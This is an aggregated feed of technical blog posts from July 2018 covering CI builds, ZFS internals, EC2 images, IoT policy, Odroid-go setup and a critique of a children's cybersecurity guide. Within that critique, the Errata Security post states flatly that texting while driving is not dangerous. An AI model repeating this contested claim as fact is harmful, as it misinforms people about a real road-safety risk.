## July 15, 2018

### Steve Kemp's Blog

#### Automating builds via CI

I've been overhauling the way that I build Debian packages and websites for myself. In the past I used pbuilder, but it is pretty heavyweight, and in my previous role I was much happier using Gitlab runners for building and deploying applications.

Gitlab is something I've no interest in self-hosting, and Jenkins is an abomination, so I figured I'd write down what kind of things I did and explore options again. My use-cases are generally very simple:

• I trigger some before-steps.
  • These mostly mean pulling a remote git repository to the local system.
• I then start a build.
  • This means running debuild, hugo, or similar.
  • This happens in an isolated Docker container.
• Once the build is complete I upload the results somewhere.
  • Either to a Debian package-pool, or to a remote host via rsync.
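The steps above can be sketched as a tiny host-side runner. This is illustrative Python, not the author's actual tool; the job structure and the docker invocation mentioned in the comment are my assumptions:

```python
import subprocess

def run_job(before, build, after):
    """Run a job as described above: before/after steps on the host,
    the build itself (conceptually) inside an isolated container."""
    for cmd in before:   # e.g. git pull on the host, where the SSH keys live
        subprocess.run(cmd, check=True)
    for cmd in build:    # in practice something like:
        # docker run --rm -v "$PWD:/src" builder-image debuild ...
        subprocess.run(cmd, check=True)
    for cmd in after:    # e.g. rsync the results to a remote host
        subprocess.run(cmd, check=True)

# A trivial dry-run with harmless commands:
run_job(before=[["echo", "pull"]],
        build=[["echo", "build"]],
        after=[["echo", "upload"]])
```

With `check=True`, any failing step aborts the job, which is the behaviour you want from a build pipeline.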

Running all these steps inside a container is well-understood, but I cheat. It is significantly easier to run the before/after steps on your host, because that way you don't need to set up SSH keys in your containers, and that is required when you clone (private) remote repositories or wish to upload to hosts via rsync over SSH.

Anyway I wrote more thoughts here:

Then I made it work. So that was nice.

To complete the process I also implemented a simple HTTP-server which will list all available jobs, and allow you to launch one via a click. The output of the build is streamed to your client in real-time. I didn't bother persisting output and success/failure to a database, but that would be trivial enough.

It'll tide me over until I try ick again, anyway. :)

### Chris Siebenmann

#### Understanding ZFS System Attributes

Like most filesystems, ZFS faces the file attribute problem. It has a bunch of file attributes, both visible ones like the permission mode and the owner and internal ones like the parent directory of things and file generation number, and it needs to store them somehow. But rather than using fixed on-disk structures like everyone else, ZFS has come up with a novel storage scheme for them, one that simultaneously deals with both different types of ZFS dnodes wanting different sets of attributes and the need to evolve attributes over time. In the grand tradition of computer science, ZFS does it with an extra level of indirection.

Like most filesystems, ZFS puts these attributes in dnodes using some extra space (in what is called the dnode 'bonus buffer'). However, the ZFS trick is that whatever system attributes a dnode has are simply packed into that space without being organized into formal structures with a fixed order of attributes. Code that uses system attributes retrieves them from dnodes indirectly by asking for, say, the ZPL_PARENT of a dnode; it never cares exactly how they're packed into a given dnode. However, obviously something does.

One way to implement this would be some sort of tagged storage, where each attribute in the dnode was actually a key/value pair. However, this would require space for all of those keys, so ZFS is more clever. ZFS observes that in practice there are only a relatively small number of different sets of attributes that are ever stored together in dnodes, so it simply numbers each distinct attribute layout that ever gets used in the dataset, and then the dnode just stores the layout number along with the attribute values (in their defined order). As far as I can tell from the code, you don't have to pre-register all of these attribute layouts. Instead, the code simply sets attributes on dnodes in memory, then when it comes time to write out the dnode in its on-disk format ZFS checks to see if the set of attributes matches a known layout or if a new attribute layout needs to be set up and registered.

(There are provisions to handle the case where the attributes on a dnode in memory don't all fit into the space available in the dnode; they overflow to a special spill block. Spill blocks have their own attribute layouts.)

I'm summarizing things a bit here; you can read all of the details and more in a big comment at the start of sa.c.
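The layout-numbering scheme can be modelled in a few lines. This is a toy illustration, not ZFS code; the attribute names merely echo the real ones:

```python
class LayoutRegistry:
    """Toy model of system-attribute layouts: each distinct set of
    attributes ever written gets a number; a 'dnode' then stores only
    that number plus the values, packed in the layout's defined order."""

    def __init__(self):
        self._numbers = {}   # attribute-name tuple -> layout number
        self._layouts = []   # layout number -> attribute-name tuple

    def number_for(self, attrs):
        key = tuple(sorted(attrs))
        if key not in self._numbers:        # first time this set is seen:
            self._numbers[key] = len(self._layouts)   # register a new layout
            self._layouts.append(key)
        return self._numbers[key]

    def pack(self, attrs):
        """'Write out' a dnode: (layout number, values in layout order)."""
        n = self.number_for(attrs)
        return n, [attrs[name] for name in self._layouts[n]]

    def unpack(self, n, values):
        return dict(zip(self._layouts[n], values))

reg = LayoutRegistry()
n1, _ = reg.pack({"ZPL_MODE": 0o644, "ZPL_PARENT": 12})
n2, _ = reg.pack({"ZPL_MODE": 0o755, "ZPL_PARENT": 4})
assert n1 == n2   # same attribute set, so the same registered layout
```

The key saving is visible here: attribute names are stored once per layout, not once per dnode.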

As someone who appreciates neat solutions to thorny problems, I quite admire what ZFS has done here. There is a cost to the level of indirection that ZFS imposes, but once you accept that cost you get a bunch of clever bonuses. For instance, ZFS uses dnodes for all sorts of internal pool and dataset metadata, and these dnodes often don't have any use for conventional Unix file attributes like permissions, owner, and so on. With system attributes, these metadata dnodes simply don't have those attributes and don't waste any space on them (and they can use the same space for other attributes that may be more relevant). ZFS has also been able to relatively freely add attributes over time.

By the way, this scheme is not quite the original scheme that ZFS used. The original scheme apparently had things more hard-coded, but I haven't dug into it in detail since this has been the current scheme for quite a while. Which scheme is in use depends on the ZFS pool and filesystem versions; modern system attributes require ZFS pool version 24 or later and ZFS filesystem version 5 or later. You probably have these, as they were added to (Open)Solaris in 2010.

## July 14, 2018

### Colin Percival

#### How to port your OS to EC2

I've been the maintainer of the FreeBSD/EC2 platform for about 7.5 years now, and as far as "running things in virtual machines" goes, that remains the only operating system and the only cloud which I work on. That said, from time to time I get questions from people who want to port other operating systems into EC2, and being a member of the open source community, I do my best to help them. I realized a few days ago that rather than replying to emails one by one it would be more efficient to post something publicly; so — for the benefit of the dozen or so people who want to port operating systems to run in EC2, and the curiosity of maybe a thousand more people who use EC2 but will never build AMIs themselves — here's a rough guide to building EC2 images.

### Chris Siebenmann

#### The challenge of storing file attributes on disk

In pretty much every Unix filesystem and many non-Unix ones, files (and more generally all filesystem objects) have a collection of various basic attributes, things like modification time, permissions, ownership, and so on, as well as additional attributes that the filesystem uses for internal purposes (eg). This means that every filesystem needs to figure out how to store and represent these attributes on disk (and to a lesser extent in memory). This presents two problems, an immediate one and a long term one.

The immediate problem is that different types of filesystem objects have different attributes that make sense for them. A plain file definitely needs a (byte) length that is stored on disk, but that doesn't make any sense to store on disk for things like FIFOs, Unix domain sockets, and even block and character devices, and it's not clear if a (byte) length still makes sense for directories either, given that they're often complex data structures today. There are also attributes that some non-file objects need that files don't; a classical example in Unix is st_rdev, the device ID of special files.

(Block and character devices may have byte lengths in stat() results but that's a different thing entirely than storing a byte length for them on disk. You probably don't want to pay any attention to the on-disk 'length' for them, partly so that you don't have to worry about updating it to reflect what you'll return in stat(). Non-linear directories definitely have a space usage, but that's usually reported in blocks; a size in bytes doesn't necessarily make much sense unless it's just 'block count times block size'.)

The usual answer for this is to punt. The filesystem will define an on-disk structure (an 'inode') that contains all of the fields that are considered essential, especially for plain files, and that's pretty much it. Objects that don't use some of the basic attributes still pay the space cost for them, and extra attributes you might want either get smuggled somewhere or usually just aren't present. Would you like attributes for how many live entries and how many empty entry slots are in a directory? You don't get them, because it would be too much overhead to have those attributes there for everything.
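A sketch of what that fixed structure looks like in practice; the field names and sizes here are invented for illustration, not any real filesystem's layout:

```python
import struct

# One fixed record with a slot for every "essential" field; every object
# pays for all of them whether it uses them or not.
INODE_FMT = "<IIIQQII"   # mode, uid, gid, size, mtime, nlink, rdev
INODE_SIZE = struct.calcsize(INODE_FMT)

def pack_inode(mode=0, uid=0, gid=0, size=0, mtime=0, nlink=1, rdev=0):
    return struct.pack(INODE_FMT, mode, uid, gid, size, mtime, nlink, rdev)

# A FIFO stores a meaningless size, a plain file a meaningless rdev,
# but both records occupy exactly the same space on disk:
assert len(pack_inode(mode=0o010644)) == INODE_SIZE
assert len(pack_inode(mode=0o100644, size=4096)) == INODE_SIZE
```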

The long term problem is dealing with the evolution of your attributes. You may think that they're perfect now (or at least that you can't do better given your constraints), but if your filesystem lives for long enough, that will change. Generally, either you'll want to add new attributes or you'll want to change existing ones (for example, widening a timestamp from 32 bits to 64 bits). More rarely you may discover that existing attributes make no sense any more or aren't as useful as you thought.

If you thought ahead, the usual answer for this is to include unused extra space in your on-disk attribute structure and then slowly start using it for new attributes or extending existing ones. This works, at least for a while, but it has various drawbacks, including that because you only have limited space you'll have long arguments about what attributes are important enough to claim some of it. On the other hand, perhaps you should have long arguments over permanent changes to the data stored in the on-disk format and face strong pressures to do it only when you really have to.

As an obvious note, the reason that people turn to a fixed on-disk 'inode' structure is that it's generally the most space-efficient option and you're going to have a lot of these things sitting around. In most filesystems, most of them will be for regular files (which will outnumber directories and other things), and so there is a natural pressure to prioritize what regular files need at the possible expense of other things. It's not the only option, though; people have tried a lot of things.

I've talked about the on-disk format for filesystems here, but you face similar issues in any archive format (tar, ZIP, etc). Almost all of them have file 'attributes' or metadata beyond the name and the in-archive size, and they have to store and represent this somehow. Often archive formats face both issues; different types of things in the archive want different attributes, and what attributes and other metadata needs to be stored changes over time. There have been some creative solutions over the years.
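As a quick illustration with a real archive format, every tar member carries the same fixed set of metadata fields regardless of its type. This uses only Python's standard library; the file name and values are made up:

```python
import io
import tarfile

# Build a one-member tar archive in memory.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    data = b"hello"
    info = tarfile.TarInfo(name="hello.txt")
    info.size = len(data)
    info.mode = 0o644
    info.mtime = 1531612800
    tar.addfile(info, io.BytesIO(data))

# Read it back: name, size, mode, mtime, uid/gid, type flag and more are
# stored per member, whether or not they make sense for that member.
buf.seek(0)
with tarfile.open(fileobj=buf, mode="r") as tar:
    member = tar.getmember("hello.txt")
    print(member.name, member.size, oct(member.mode), member.isfile())
```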

## July 13, 2018

### Errata Security

First Lady Melania Trump announced a guide to help children go online safely. It has problems.

Melania's guide is full of outdated, impractical, inappropriate, and redundant information. But that's allowed, because it relies upon moral authority: to be moral is to be secure, to be moral is to do what the government tells you. It matters less whether the advice is technically accurate, and more that you are supposed to do what authority tells you.

That's a problem, not just with her guide, but most cybersecurity advice in general. Our community gives out advice without putting much thought into it, because it doesn't need thought. You should do what we tell you, because being secure is your moral duty.

This post picks apart Melania's document. The purpose isn't to fine-tune her guide and make it better. Instead, the purpose is to demonstrate the idea of resting on moral authority instead of technical authority.

### Strong passwords

"Strong passwords" is the quintessential cybersecurity cliché: it implies that insecurity is due to some "weakness" (laziness, ignorance, greed, etc.) and that the remedy is to be "strong".

The first flaw is that this advice is outdated. Ten years ago, important websites would frequently get hacked and have poor password protection (like MD5 hashing). Back then, strength mattered, to stop hackers from brute force guessing the hacked passwords. These days, important websites get hacked less often and protect the passwords better (like salted bcrypt). Moreover, the advice is now often redundant: websites, at least the important ones, enforce a certain level of password complexity, so that even without advice, you'll be forced to do the right thing most of the time.

This advice is outdated for a second reason: hackers have gotten a lot better at cracking passwords. Ten years ago, they focused on brute force, trying all possible combinations. Partly because passwords are now protected better, dramatically reducing the effectiveness of the brute force approach, hackers have had to focus on other techniques, such as the mutated dictionary and Markov chain attacks. Consequently, even though "Password123!" seems to meet the above criteria of a strong password, it'll fall quickly to a mutated dictionary attack. The simple recommendation of "strong passwords" is no longer sufficient.
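To make the mutated-dictionary point concrete, here is a deliberately tiny sketch. The mutation rules are my own simplified examples, but they are already enough to derive "Password123!" from the dictionary word "password":

```python
def mutations(word):
    """Yield common 'strong-looking' variants of a dictionary word."""
    for base in (word, word.capitalize(), word.upper()):
        for suffix in ("", "1", "123", "123!", "!", "2018"):
            yield base + suffix

candidates = set(mutations("password"))
assert "Password123!" in candidates   # meets typical complexity rules anyway
```

Real cracking tools apply thousands of such rules per word, which is why a password that merely *looks* complex buys you very little.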

The last part of the above advice is to avoid password reuse. This is good advice. However, this becomes impractical advice, especially when the user is trying to create "strong" complex passwords as described above. There's no way users/children can remember that many passwords. So they aren't going to follow that advice.

To make the advice work, you need to help users with this problem. To begin with, you need to tell them to write down all their passwords. This is something many people avoid, because they've been told to be "strong" and writing down passwords seems "weak". Indeed it is, if you write them down in an office environment and stick them on a note on the monitor or underneath the keyboard. But they are safe and strong if it's on paper stored in your home safe, or even in a home office drawer. I write my passwords on the margins in a book on my bookshelf -- even if you know that, it'll take you a long time to figure out which book when invading my home.

The other option to help avoid password reuse is to use a password manager. I don't recommend them to my own parents because that'd be just one more thing I'd have to help them with, but they are fairly easy to use. It means you need only one password for the password manager, which then manages random/complex passwords for all your web accounts.
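The point of a manager is that each site gets a long random password nobody has to remember; a sketch using Python's standard secrets module (the alphabet and length here are arbitrary choices of mine):

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def random_password(length=20):
    """Generate a per-site password; only the manager has to remember it."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(random_password())   # different every call, so never reused across sites
```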

So what we have here is outdated and redundant advice that overshadows good advice that is nonetheless incomplete and impractical. The advice is based on the moral authority of telling users to be "strong" rather than the practical advice that would help them.

### No personal info unless website is secure

The guide teaches kids to recognize the difference between a secure/trustworthy and insecure website. This is laughably wrong.

HTTPS means the connection to the website is secure, not that the website is secure. These are different things. It means hackers are unlikely to be able to eavesdrop on the traffic as it's transmitted to the website. However, the website itself may be insecure (easily hacked), or worse, it may be a fraudulent website created by hackers to appear similar to a legitimate website.

This misconception about what HTTPS secures is perpetuated by guides like this. It is the source of criticism of LetsEncrypt, an initiative to give away free website certificates so that everyone can get HTTPS. Hackers now routinely use LetsEncrypt to create fraudulent websites that host their viruses. Since people have been taught for years that HTTPS means a website is "secure", people trust these hacker websites.

But LetsEncrypt is a good thing, all connections should be secure. What's bad is not LetsEncrypt itself, but guides like this from the government that have for years been teaching people the wrong thing, that HTTPS means a website is secure.

### Backups

Of course, no guide would be complete without telling people to backup their stuff.

This is especially important with the growing ransomware threat. Ransomware is a type of virus/malware that encrypts your files then charges you money to get the key to decrypt the files. Half the time this just destroys the files.

But this again is moral authority, telling people what to do, instead of educating them how to do it. Most will ignore this advice because they don't know how to effectively backup their stuff.

For most users, it's easy to go to the store and buy a 256-gigabyte USB drive for $40 (as of May 2018), then use the "Time Machine" feature in macOS, or on Windows the "File History" or "Backup and Restore" features. These can be configured to do the backup automatically on a regular basis so that you don't have to worry about it.

But such "local" backups are still problematic. If the drive is left plugged into the machine, ransomware can attack the backup. If there's a fire, any backup in your home will be destroyed along with the computer.

I recommend cloud backup instead. There are many good providers, like Dropbox, Backblaze, Microsoft, Apple's iCloud, and so on. These are especially critical for phones: if your iPhone is destroyed or stolen, you can simply walk into an Apple store and buy a new one, with everything restored as it was from iCloud.

But all of this is missing the key problem: your photos. You carry a camera with you all the time now and take a lot of high-resolution photos. This quickly exceeds the capacity of most of the free backup solutions. You can configure these, such as your phone's iCloud backup, to exclude photos, but that means you are prone to losing your photos/memories. For example, Dropbox is great for the free 5-gigabyte service, but if I want to preserve photos on it, I have to pay for their more expensive service.

One of the key messages kids should learn about photos is that they will likely lose almost all of the photos they've taken within 5 years. The exceptions will be the few photos they've posted to social media, which sorta serves as a cloud backup for them. If they want to preserve the rest of these memories, kids need to take seriously finding backup solutions. I'm not sure of the best solution, but I buy big USB flash drives and send them to my niece asking her to copy all her photos to them, so that at least I can put them in a safe.

One surprisingly good solution is Microsoft Office 365. For $99 a year, you get a copy of their Office software (which I use), but it also comes with 1 terabyte of cloud storage, which is likely big enough for your photos. Apple charges around the same amount for 1 terabyte of iCloud, though it doesn't come with a free license for Microsoft Office :-).

### WiFi encryption

Your home WiFi should be encrypted, of course.

I have to point out the language, though. Turning on WPA2 WiFi encryption does not "secure your network". Instead, it just secures the radio signals from being eavesdropped. Your network may have other vulnerabilities, where encryption won't help, such as when your router has remote administration turned on with a default or backdoor password enabled.

I'm being a bit pedantic here, but it's not my argument. It's the FTC's argument when they sued vendors like D-Link for making exactly the same sort of recommendation. The FTC claimed it was deceptive business practice because recommending users do things like this still didn't mean the device was "secure". Since the FTC is partly responsible for writing Melania's document, I find this a bit ironic.

In any event, WPA2 personal has problems where it can be hacked, such as if WPS is enabled, or evil twin access-points broadcasting stronger (or more directional) signals. It's thus insufficient security. To be fully secure against possible WiFi eavesdropping you need to enable enterprise WPA2, which isn't something most users can do.

Also, WPA2 is largely redundant. If you wardrive your local neighborhood you'll find that almost everyone has WPA enabled already anyway. Guides like this probably don't need to advise what everyone's already doing, especially when it's still incomplete.

Thus, they ignore the important thing (remote administration) and instead focus on the less important thing (change default password).

In addition, this advice again makes the impractical recommendation of choosing a complex (strong) password. Users who do this usually forget it by the time they next need it. Practical advice is to recommend users write down the password they choose, and put it either someplace they won't forget (like with the rest of their passwords), or on a sticky note under the router.

### Update router firmware

Like any device on the network, your router should be kept up-to-date with the latest patches. But you aren't going to do that, because it's not practical. While your laptop/desktop and phone nag you about updates, your router won't. Whereas phones/computers update once a month, your router vendor will update the firmware once a year -- and after a few years, stop releasing updates altogether.

Routers are just one of many IoT devices we are going to have to come to terms with keeping patched. I don't know the right answer. I check my parents' stuff every Thanksgiving, so maybe that's a good strategy: patch your stuff at the end of every year. Maybe some cultural norms will develop, but simply telling people to be strong about their IoT firmware patches isn't going to be practical in the near term.

### Don't click on stuff

This is probably the most common piece of cybersecurity advice given by infosec professionals. It is wrong.

Emails/messages are designed for you to click on things. You regularly get emails/messages from legitimate sources that demand you click on things. It's so common from legitimate sources that there's no practical way for users to distinguish between them and bad sources. As that Google Docs bug showed, even experts can't always tell the difference.

I mean, it's true that phishing attacks coming through emails/messages try to trick you into clicking on things, and you should be suspicious of such things. However, it doesn't follow from this that not clicking on things is a practical strategy. It's like diet advice recommending you stop eating food altogether.

### Sex predators, oh my!

Of course, it's kids going online, so of course you are going to have warnings about sexual predators:

But online predators are rare. The predator threat to children is overwhelmingly from relatives and acquaintances, a much smaller threat from strangers, and a vanishingly tiny threat from online predators. Recommendations like this stem from our fears of the unknown technology rather than a rational measurement of the threat.

### Sexting, oh my!

So here is one piece of advice that I can agree with: don't sext:

But the reason this is bad is not because it's immoral or wrong, but because adults have gone crazy and made it illegal for children to take nude photographs of themselves. As this article points out, your child is more likely to get in trouble and get placed on the sex offender registry (for life) than to get molested by a person on that registry.

Thus, we need to warn kids away not from some immoral activity, but from adults who've gotten freaked out about it. Yes, sending pictures to your friends/love-interest will also often get you in trouble, as those images will frequently get passed around school, but such temporary embarrassments will pass. Getting put on a sex offender registry harms you for life.

### Texting while driving

Finally, I want to point out this error:

The evidence is to the contrary: texting while driving is not actually dangerous -- it's just assumed to be. Texting rarely distracts drivers from what's happening on the road. It instead replaces some other inattention, such as daydreaming, fiddling with the radio, or checking yourself in the mirror. Risk compensation happens: when people text while driving, they also slow down and leave more space between themselves and the car in front of them.

Studies have shown this. For example, one study measured accident rates at 6:59pm vs 7:01pm and found no difference. That's when "free evening texting" came into effect, so if texting were dangerous we should've seen a bump in the number of accidents. They even tried to narrow the effect down, such as by looking at people texting while changing cell towers (proving they were in motion).

Yes, texting is illegal, but that's because people are fed up with the jerk in front of them not noticing the light is green. It's not illegal because it's particularly dangerous, in the sense of having a measurable impact on accident rates.

### Conclusion

The point of this post is not to refine the advice and make it better. Instead, I attempt to demonstrate how such advice rests on moral authority, because it's the government telling you so. It's because cybersecurity and safety are higher moral duties. Much of it is outdated, impractical, inappropriate, and redundant.

We need to move away from this sort of advice. Instead of moral authority, we need technical authority. We need to focus on the threats that people actually face, and help them be secure, instead of commanding them what to do and shaming them for their insecurity. It's like Strunk and White's "Elements of Style": they don't take the moral-authority approach and simply tell people how to write; instead they try to help people write well.

#### Your IoT security concerns are stupid

Lots of government people are focused on IoT security, such as this bill or this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question. Government efforts focus on vulns and patching, ignoring more important issues.

Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.

Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.

Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have the unique requirements of being exposed to the Internet and needing a remote factory reset, and that combination led to the worm. While notPetya did exploit a Microsoft vuln, its primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite in support of their vuln/patching policy, neither was really about vuln/patching.

Such technical analysis of events like Mirai and notPetya is ignored. Policymakers cherry-pick only the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.

IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com, shipped directly from Shenzhen, now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.

In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100 billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4 billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.

Lastly, focusing on the vendor is a tired government cliché. Chronic Internet security problems that go unsolved year after year, decade after decade, come from users failing, not vendors. Vendors quickly adapt; users don't. The most important solutions to today's IoT insecurities are to firewall and microsegment networks, something wholly within the control of users, even home users. Yet government policymakers won't consider the most important solutions, because their goal is less cybersecurity itself and more how cybersecurity can further their political interests.

The best government policy for IoT is to do nothing, or at least to focus on more relevant solutions than patching vulns. The ideas proposed above will add costs to devices while providing insignificant benefits to security.
Yes, we will have IoT security issues in the future, but they will be new and interesting ones, requiring different solutions than the ones proposed.

### Steve Kemp's Blog

#### Odroid-go initial impressions

Recently I came across a Hacker News post about the Odroid-go, which is a tiny hand-held console, somewhat resembling a Game Boy. In terms of hardware this is powered by an ESP32 chip, which is something I'm familiar with due to my work on Arduino, ESP8266, and other simple hardware projects. Anyway the Odroid device costs about $40, can be programmed via the Arduino-studio, and comes by default with a series of emulators for "retro" hardware:

• Game Boy (GB)
• Game Boy Color (GBC)
• Game Gear (GG)
• Nintendo Entertainment System (NES)
• Sega Master System (SMS)

I figured it was cheap, and because of its programmable nature it might be fun to experiment with. Though in all honesty my intentions were mostly to play NES games upon it. The fact that it is programmable means I can pretend I'm doing more interesting things than I probably would be!

Most of the documentation is available on this wiki:

The Arduino setup guide describes how to install the libraries required to support the hardware, but makes no mention of the board-support required to connect to an ESP32 device.

So to get a working setup you need to do two things:

• Install the libraries & sample-code.
• Install the board-support.

The first is documented, but here it is again:

    git clone https://github.com/hardkernel/ODROID-GO.git \
        ~/Arduino/libraries/ODROID-GO


The second is not documented. In short you need to download the esp32 hardware support via this incantation:

    mkdir -p ~/Arduino/hardware/espressif && \
    cd ~/Arduino/hardware/espressif && \
    git clone https://github.com/espressif/arduino-esp32.git esp32 && \
    cd esp32 && \
    git submodule update --init --recursive && \
    cd tools && \
    python2 get.py


(This assumes that you're using ~/Arduino for your code, but since almost everybody does ..)

Anyway the upshot of this should be that you can:

• Choose "Tools | Boards | ODROID ESP32" to select the hardware to build for.
• Click "File | Examples | ODROID-Go | ...." to load a sample project.
• This can now be compiled and uploaded, but read on for the flashing-caveat.

Another gap in the instructions is that uploading projects fails, even when you choose the correct port (Tools | Ports | ttyUSB0). To correct this you need to put the device into flash-mode:

• Turn it off.
• Hold down "Volume"
• Turn it on.
• Click Upload in your Arduino IDE.

The end result is you'll have your own code running on the device, as per this video:

Enough said. Once you've done this, when you turn the device on you'll see the text scrolling around. So we've overwritten the flash with our program. Oops. No more emulation for us!

The process of getting the emulators running, or updated, has two parts:

• First of all the system firmware must be updated.
• Secondly you need to update the actual emulators.

To be honest I expect you only need to do this part once, unless you're uploading your own code to it. The firmware pretty much just boots, and if it finds a magic file on the SD-card it'll copy it into flash. Then it'll either execute this new code, or execute the old/pre-existing code if no update was found.

Anyway get the tarball, extract it, and edit the two files if your serial device is not /dev/ttyUSB0:

• eraseflash.sh
• flashall.sh

Once you've done that, run them both, in order:

    $ ./eraseflash.sh
    $ ./flashall.sh


NOTE: Here again I had to turn the device off, hold down the volume button, turn it on, and only then execute ./eraseflash.sh. This puts the device into flashing-mode.

NOTE: Here again I had to turn the device off, hold down the volume button, turn it on, and only then execute ./flashall.sh. This puts the device into flashing-mode.

Anyway if that worked you'll see your blue LED flashing on the front of the device. It'll flash quickly to say "Hey there is no file on the SD-card". So we'll carry out the second step - Download and place firmware.bin into the root of your SD-card. This comes from here:

(firmware.bin contains the actual emulators.)

Insert the card. The contents of firmware.bin will be sucked into flash, and you're ready to go. Turn off your toy, remove the SD-card, load it up with games, and reinsert it.

Power on your toy and enjoy your games. Again a simple demo:

Games are laid out in a simple structure:

    ├── firmware.bin
    ├── odroid
    │   ├── data
    │   └── firmware
    └── roms
        ├── gb
        │   └── Tetris (World).gb
        ├── gbc
        ├── gg
        ├── nes
        │   ├── Lifeforce (U).nes
        │   ├── SMB-3.nes
        │   └── Super Bomberman 2 (E) [!].nes
        └── sms

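The directory skeleton above can be created in one go; a minimal sketch (the game filenames are just examples from the listing):

```shell
# Create the directory layout the firmware expects on the SD-card.
mkdir -p odroid/data odroid/firmware
mkdir -p roms/gb roms/gbc roms/gg roms/nes roms/sms
# firmware.bin goes in the root; ROMs go into the per-system directories, e.g.:
# cp "Tetris (World).gb" roms/gb/
ls roms
```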

You can find a template here:

### Chris Siebenmann

#### ZFS on Linux's sharenfs problem (of what you can and can't put in it)

ZFS has an idea of 'properties' for both pools and filesystems. To quote from the Illumos zfs manpage:

Properties are divided into two types, native properties and user-defined (or "user") properties. Native properties either export internal statistics or control ZFS behavior. [...]

Filesystem properties are used to control things like whether compression is on, where a ZFS filesystem is mounted, if it is read-only or not, and so on. One of those properties is called sharenfs; it controls whether or not the filesystem is NFS exported, and what options it's exported with. One of the advantages of having ZFS manage this for you through the sharenfs property is that ZFS will automatically share and unshare things as the ZFS pool and filesystem are available or not available; you don't have to try to coordinate the state of your NFS shares and your ZFS filesystem mounts.

As I write this, the current ZFS on Linux zfs manpage says this about sharenfs:

Controls whether the file system is shared via NFS, and what options are to be used. [...] If the property is set to on, the dataset is shared using the default options:

sec=sys,rw,crossmnt,no_subtree_check,no_root_squash

See exports(5) for the meaning of the default options. Otherwise, the exportfs(8) command is invoked with options equivalent to the contents of this property.

That's very interesting wording. It's also kind of a lie, because ZFS on Linux caught itself in a compatibility bear trap (or so I assume).

This wording is essentially the same as the wording in Illumos (and in the original Solaris manpages). On Solaris, the sharenfs property is passed more or less straight to share_nfs as the NFS share options in its -o argument, and as a result what you put in sharenfs is just those options. This makes sense; the original Solaris version of ZFS was not created to be portable to other Unixes, so it made no attempt to have its sharenfs (or sharesmb) be Unix-independent. It was part of Solaris, so what went into sharenfs was Solaris NFS share options, including obscure ones.

It would have been natural for ZFS on Linux to take the same attitude towards what went into sharenfs on Linux, and indeed the current wording of the manpage sort of implies that this is what's happening and that you can simply use what you'd put in exports(5). Unfortunately, this is not the case. Instead, ZFS on Linux attempts to interpret your sharenfs setting as OmniOS NFS share options and tries to convert them to equivalent Linux options.

(I assume that this was done to make it theoretically easier to move pools and filesystems between ZoL and Illumos/Solaris ZFS, because the sharenfs property would mean the same thing and be interpreted the same way on both systems. Moving filesystems back and forth is not as crazy as it sounds, given zfs send and zfs receive.)

There are two problems with this. The first is that the conversion process doesn't handle all of the Illumos NFS share options. Some it will completely reject or fail on (they're just totally unsupported), while others it will accept but produce incorrect conversions that don't work. The set of accepted and properly handled conversions is not documented and is unlikely to ever be. The second problem is that Linux can do things with NFS share options that Illumos doesn't support (the reverse is true too, but less directly relevant). Since ZFS on Linux provides you no way to directly set Linux share options, you can't use these Linux specific NFS share options at all through sharenfs.

Effectively, the current ZFS on Linux approach restricts you to an undocumented subset of the Illumos NFS share options: those that are supported by Linux and correctly converted by ZoL. If you're doing anything at all sophisticated with your NFS sharing options (as we are), this means that using sharenfs on Linux is simply not an option. We're going to have to roll our own NFS share option handling and management system, which is a bit irritating.

(We're also going to have to make sure that we block or exclude sharenfs properties from being transferred from our OmniOS fileservers to our ZoL fileservers during 'zfs send | zfs receive' copies, which is a problem that hadn't occurred to me until I wrote this entry.)

PS: There is an open ZFS on Linux issue to fix the documentation; it includes mentions of some mis-parsing sharenfs bugs. I may even have the time and energy to contribute a patch at some point.

PPS: Probably what we should do is embed our Linux NFS share options as a ZFS filesystem user property. This would at least allow our future management system to scan the current ZFS filesystems to see what the active NFS shares and share options should be, as opposed to having to also consult and trust some additional source of information for that.
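A user property along these lines might look like the following sketch. This is only an illustration: the property name "ourlab:nfsoptions", the option string, and the dataset name are all invented, and the commands need root and an existing ZFS pool to run.

```shell
# Hypothetical: stash the Linux NFS export options in a ZFS user property.
# User property names must contain a colon; "ourlab:nfsoptions" is made up.
zfs set ourlab:nfsoptions='rw=@10.0.0.0/24,no_root_squash' tank/homes

# A management script can later recover the value to feed to exportfs:
zfs get -H -o value ourlab:nfsoptions tank/homes
```

Because user properties are inherited and survive zfs send | zfs receive, the management system only needs to trust the filesystems themselves, not a separate database.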

## July 10, 2018

### Raymii.org

#### log_vcs - Ansible callback plugin that creates VCS (git) branches for every Ansible run

